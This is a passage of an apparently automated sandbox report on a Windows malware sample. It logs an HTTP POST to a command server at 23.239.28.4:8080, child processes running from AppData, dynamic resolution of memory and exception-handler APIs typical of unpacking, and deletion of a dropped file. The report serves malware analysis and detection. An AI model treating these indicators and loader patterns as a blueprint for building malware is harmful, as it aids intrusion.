| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 68732 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 68724, size_out = 68724 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
2 |
Process #9: hytmjoxhrtf.exe
28
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\hytmjoxhrtf.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\hyTmJoXHrTF.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:22, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x894 |
| Parent PID | 0x734 (c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
890
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001d2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001edfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0028ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
- |
| hytmjoxhrtf.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| locale.nls | 0x00430000 | 0x00496fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0051ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x006a7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x00830fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x01c3ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001c40000 | 0x01c40000 | 0x01cbffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001df0000 | 0x01df0000 | 0x01e2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001e30000 | 0x01e30000 | 0x02222fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02230000 | 0x024fefff | Memory Mapped File | Readable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
Module (27)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x74cb0000 |
|
2 | |
| Load | USER32.dll | base_address = 0x75570000 |
|
1 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x75570000 |
|
1 | |
| Get Filename | c:\windows\syswow64\user32.dll | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\hytmjoxhrtf.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18faec |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb34 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
2 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 |
Process #10: hytmjoxhrtf.exe
36
0
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\hytmjoxhrtf.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\hyTmJoXHrTF.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:24, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8a8 |
| Parent PID | 0x894 (c:\users\aetadzjz\appdata\local\microsoft\windows\hytmjoxhrtf.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
468
0x
8B4
0x
8D4
0x
8E0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00216fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00221fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0023ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002d2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002edfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002fdfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0030ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00350fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| hytmjoxhrtf.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x005b7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x006fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00880fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x01c8ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001c90000 | 0x01c90000 | 0x01ccffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001d30000 | 0x01d30000 | 0x01d6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d70000 | 0x01d70000 | 0x02162fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02170000 | 0x0243efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002440000 | 0x02440000 | 0x0253ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002540000 | 0x02540000 | 0x0263ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002640000 | 0x02640000 | 0x0273ffff | Private Memory | Readable, Writable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x74770000 | 0x74785fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x747b0000 | 0x747c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wtsapi32.dll | 0x747d0000 | 0x747dcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x747e0000 | 0x747eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
File (1)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\OverloadGabriola.exe | - |
|
1 |
Module (28)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x74cb0000 |
|
2 | |
| Load | USER32.dll | base_address = 0x75570000 |
|
1 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x75570000 |
|
1 | |
| Get Filename | c:\windows\syswow64\user32.dll | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\hytmjoxhrtf.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\hytmjoxhrtf.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\hyTmJoXHrTF.exe, size = 260 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18faec |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb34 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
2 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
